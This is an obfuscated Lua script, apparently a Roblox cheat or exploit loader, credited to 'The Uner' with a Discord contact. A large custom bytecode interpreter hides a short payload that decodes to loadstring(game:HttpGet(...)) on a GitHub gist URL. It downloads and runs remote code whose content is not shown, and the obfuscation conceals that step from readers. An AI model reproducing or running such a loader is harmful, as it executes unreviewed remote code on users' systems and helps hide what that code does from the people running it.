--Fear Mode By The Uner

--Credit entity by The Uner

--But Wh1t3 or blink or claim not by The Uner

--Stupid You Dont Copy Mode

--A60 discord is francescobarbu

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v101=0;local v102;while true do if (v101==1) then return v102;end if (v101==0) then v102=v5(v82,v19);v19=nil;v101=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(0 -0) -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + (1139 -(68 + 997))))) -(v32-((1839 -(226 + 1044)) -(367 + 201)))) + 1)) ;return v84-(v84%(4 -3)) ;end end else local v85=927 -(214 + 713) ;local v86;while true do if (v85==(0 + 0)) then v86=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v86 + v86))>=v86) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=117 -(32 + (202 -117)) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + ((1770 -812) -(892 + 65)) ;v34=1;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -((1019 -(802 + 150)) + 113)) );v18=v18 + 3 + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24() local v42=442 -(416 + 26) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(7 -4)) then if (v47==(0 + 0)) then if (v46==(0 -0)) then return v48 * (438 -(145 + (2206 -(1789 + 124)))) ;else v47=431 -((810 -(745 + 21)) + 386) ;v45=(7035 -5549) -(344 + 654 + 488) ;end elseif (v47==(651 + 1396)) then return ((v46==(0 + 0)) and (v48 * (1/(997 -(915 + 82))))) or (v48 * NaN) ;end return v8(v48,v47-(2896 -1873) ) * (v45 + (v46/(((5 -3) + 0)^(68 -(7 + 9))))) ;end if (v42==(0 -0)) then v43=v23();v44=v23();v42=1188 -(1069 + 118) ;end if (v42==(4 -2)) then v47=v20(v44,21,110 -79 );v48=((v20(v44,891 -(814 + 45) )==(2 -1)) and  -1) or (1 -0) ;v42=1 + 2 ;end if (v42==(1 -0)) then v45=1 + (0 -0) ;v46=(v20(v44,792 -(368 + 4 + 419) ,62 -42 ) * ((20 -(10 + (27 -19)))^((1869 -(760 + 987)) -90))) + v43 ;v42=2;end end end local function v25(v49) local v50=(859 + 196) -(87 + 968) ;local v51;local v52;while true do if (v50==(0 -(254 -(163 + 91)))) then v51=nil;if  not v49 then local v96=0 + 0 ;while true do if (v96==0) then v49=v23();if (v49==(376 -(85 + 291))) then return "";end break;end end end v50=1;end if (v50==((1936 -(1869 + 61)) -(1 + 2))) then return v6(v52);end if (v50==(1415 -(447 + 966))) then v52={};for v90=2 -1 , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=1820 -(1703 + (401 -287)) ;end if (v50==(702 -(376 + 325))) then v51=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;v50=5 -3 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 -0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0 + 0 ;end)();while true do if ((700 -(271 + 429))~=v66) then else if (v53== #"}") then local v97=(function() return 0;end)();local v98=(function() return;end)();while true do if (v97~=0) then else v98=(function() return 0 + 0 ;end)();while true do if (v98==1) then for v150= #"]",v58 do local v151=(function() return 1500 -(1408 + 92) ;end)();local v152=(function() return;end)();local v153=(function() return;end)();local v154=(function() return;end)();while true do if (v151~=(1086 -(461 + 625))) then else local v170=(function() return 1288 -(993 + 295) ;end)();while true do if (v170~=(1 + 0)) then else v151=(function() return 1;end)();break;end if (v170~=0) then else v152=(function() return 0;end)();v153=(function() return nil;end)();v170=(function() return 1;end)();end end end if (v151==1) then v154=(function() return nil;end)();while true do if (v152~=1) then else if (v153== #"[") then v154=(function() return v21()~=(1171 -(418 + 753)) ;end)();elseif (v153==(1 + 1)) then v154=(function() return v24();end)();elseif (v153~= #"nil") then else v154=(function() return v25();end)();end v59[v150]=(function() return v154;end)();break;end if (v152==(0 + 0)) then local v173=(function() return 0;end)();while true do if (v173==1) then v152=(function() return 1 + 0 ;end)();break;end if (v173~=0) then else v153=(function() return v21();end)();v154=(function() return nil;end)();v173=(function() return 1 + 0 ;end)();end end end end break;end end end v57[ #"asd"]=(function() return v21();end)();v98=(function() return 531 -(406 + 123) ;end)();end if (v98~=(1771 -(1749 + 20))) then else v53=(function() return 1 + 1 ;end)();break;end if (v98==(1322 -(1249 + 73))) then v58=(function() return v23();end)();v59=(function() return {};end)();v98=(function() return 1 + 0 ;end)();end end break;end end end if (v53==(1145 -(466 + 679))) then local v99=(function() return 0 -0 ;end)();local v100=(function() return;end)();while true do if (v99~=(0 -0)) then else v100=(function() return 0;end)();while true do if (v100~=1) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v100=(function() return 1902 -(106 + 1794) ;end)();end if (v100==(0 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v100=(function() return 1 + 0 ;end)();end if (v100==(5 -3)) then v53=(function() return  #"<";end)();break;end end break;end end end v66=(function() return 1;end)();end if ((2 -1)~=v66) then else if (v53==2) then for v103= #"/",v23() do local v104=(function() return v21();end)();if (v20(v104, #"<", #"/")~=0) then else local v107=(function() return 114 -(4 + 110) ;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();while true do if (v107==(586 -(57 + 527))) then while true do if (v108== #"nil") then if (v20(v110, #"91(", #"-19")~= #":") then else v111[ #"?id="]=(function() return v59[v111[ #".com"]];end)();end v54[v103]=(function() return v111;end)();break;end if (v108==(1427 -(41 + 1386))) then local v165=(function() return 0;end)();local v166=(function() return;end)();while true do if (v165==0) then v166=(function() return 103 -(17 + 86) ;end)();while true do if (v166==(0 + 0)) then v109=(function() return v20(v104,2, #"gha");end)();v110=(function() return v20(v104, #"0313",6);end)();v166=(function() return 1;end)();end if (v166~=1) then else v108=(function() return  #"]";end)();break;end end break;end end end if (v108==(3 -1)) then local v167=(function() return 0 -0 ;end)();local v168=(function() return;end)();while true do if (v167~=0) then else v168=(function() return 166 -(122 + 44) ;end)();while true do if (v168~=(1 -0)) then else v108=(function() return  #"gha";end)();break;end if (v168==0) then if (v20(v110, #"!", #" ")== #"/") then v111[2]=(function() return v59[v111[6 -4 ]];end)();end if (v20(v110,2,2 + 0 )== #" ") then v111[ #"xnx"]=(function() return v59[v111[ #"nil"]];end)();end v168=(function() return 1 + 0 ;end)();end end break;end end end if (v108== #">") then local v169=(function() return 0;end)();while true do if (v169==0) then v111=(function() return {v22(),v22(),nil,nil};end)();if (v109==0) then local v174=(function() return 0;end)();while true do if (0~=v174) then else v111[ #"asd"]=(function() return v22();end)();v111[ #".dev"]=(function() return v22();end)();break;end end elseif (v109== #"~") then v111[ #"-19"]=(function() return v23();end)();elseif (v109==2) then v111[ #"19("]=(function() return v23() -(2^(32 -16)) ;end)();elseif (v109== #"gha") then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if (0~=v181) then else v182=(function() return 65 -(30 + 35) ;end)();while true do if (v182==(0 + 0)) then v111[ #"19("]=(function() return v23() -((1259 -(1043 + 214))^(60 -44)) ;end)();v111[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v169=(function() return 1;end)();end if (v169==1) then v108=(function() return 1214 -(323 + 889) ;end)();break;end end end end break;end if (v107~=1) then else local v148=(function() return 0;end)();while true do if (v148==(0 -0)) then v110=(function() return nil;end)();v111=(function() return nil;end)();v148=(function() return 1;end)();end if (v148==1) then v107=(function() return 582 -(361 + 219) ;end)();break;end end end if (v107==(320 -(53 + 267))) then local v149=(function() return 0;end)();while true do if (v149==1) then v107=(function() return 1;end)();break;end if (v149~=0) then else v108=(function() return 0 + 0 ;end)();v109=(function() return nil;end)();v149=(function() return 414 -(15 + 398) ;end)();end end end end end end for v105= #"/",v23() do v55[v105-#"~" ]=(function() return v28();end)();end return v57;end break;end end end end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[338 -(144 + 192) ];local v65=v60[985 -(18 + 964) ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=3 -2 ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -((1868 -1017) -(20 + (1999 -1169))) ;local v76={};local v77={};for v87=0 + 0 ,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + (127 -((988 -(826 + 46)) + 10)) ];else v77[v87]=v74[v87 + 1 + 0 ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do v79=v67[v71];v80=v79[739 -(542 + 196) ];if (v80<=(21 -(2 + 12))) then if ((3769>=1173) and (v80<=((1693 -(1121 + 569)) + 0))) then if (v80<=(1 + 0)) then if (v80==(0 -0)) then local v112=v79[1 + 1 ];local v113,v114=v70(v77[v112](v13(v77,v112 + 1 + 0 ,v79[2 + 1 ])));v72=(v114 + v112) -1 ;local v115=0 + (214 -(22 + 192)) ;for v142=v112,v72 do v115=v115 + (2 -1) ;v77[v142]=v113[v115];end else do return;end end elseif (v80==(4 -2)) then v77[v79[2]]={};else local v117=0 -0 ;local v118;local v119;while true do if (v117==(1551 -(1126 + 425))) then v118=v79[407 -((1065 -(245 + 702)) + (906 -619)) ];v119=v77[v79[(4 + 7) -(1906 -(260 + 1638)) ]];v117=(1562 -(382 + 58)) -(118 + 1003) ;end if (v117==(2 -1)) then v77[v118 + 1 + (683 -(483 + 200)) ]=v119;v77[v118]=v119[v79[381 -(142 + (1698 -(1404 + 59))) ]];break;end end end elseif (v80<=(861 -(564 + 292))) then if ((1485==1485) and (v80>(18 -14))) then v77[v79[2]]();else v77[v79[5 -3 ]]=v79[1 + 2 ];end elseif ((v80>(983 -(553 + 424))) or (3315<=2782)) then v77[v79[3 -1 ]]();else do return;end end elseif (v80<=(10 + 1)) then if ((v80<=(9 + 0)) or (876>=2964)) then if (v80>((13 -8) + 3)) then local v122=v79[(1 -0) + (766 -(468 + 297)) ];v77[v122]=v77[v122](v13(v77,v122 + 1 + 0 ,v72));else local v124=v79[4 -2 ];local v125=v77[v79[7 -4 ]];v77[v124 + (2 -(563 -(334 + 228))) ]=v125;v77[v124]=v125[v79[2 + (6 -4) ]];end elseif ((v80>((153 -105) -38)) or (2232>2497)) then v77[v79[2 -0 ]]=v79[756 -(239 + 514) ];else v77[v79[1 + 1 ]]={};end elseif ((v80<=((3110 -1768) -(797 + 532))) or (2110<=332)) then if (v80>(9 + 3)) then v77[v79[1 + 1 ]]=v62[v79[6 -3 ]];else v77[v79[1204 -(373 + 829) ]]=v62[v79[(12 -5) -(2 + 2) ]];end elseif (v80>((620 + 125) -(476 + 255))) then local v136=(1366 -(141 + 95)) -(369 + 761) ;local v137;while true do if (v136==0) then v137=v79[4 -2 ];v77[v137]=v77[v137](v13(v77,v137 + 1 + 0 + 0 ,v72));break;end end else local v138=v79[4 -2 ];local v139,v140=v70(v77[v138](v13(v77,v138 + (1 -(0 -0)) ,v79[7 -4 ])));v72=(v140 + v138) -(1 -0) ;local v141=238 -(64 + (517 -343)) ;for v145=v138,v72 do local v146=0;while true do if ((3686>3172) and (v146==(1189 -(449 + 740)))) then v141=v141 + (1206 -(902 + 303)) ;v77[v145]=v139[v141];break;end end end end v71=v71 + (2 -1) + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574038A3Q00682Q7470733A2Q2F676973742E67697468756275736572636F6E74656E742E636F6D2F687579686F616E706875632F3632632Q622Q61373230663863316139352Q62393166396334393164666331382F7261772F33393032366663656163623364323938613764632Q36636437363137633336653566302Q346234362F6769737466696C65312E74787400094Q00027Q00120D000100013Q00120D000200023Q00200300020002000300120B000400044Q000E000200044Q000900013Q00022Q00070001000100012Q00013Q00017Q00",v9(),...);
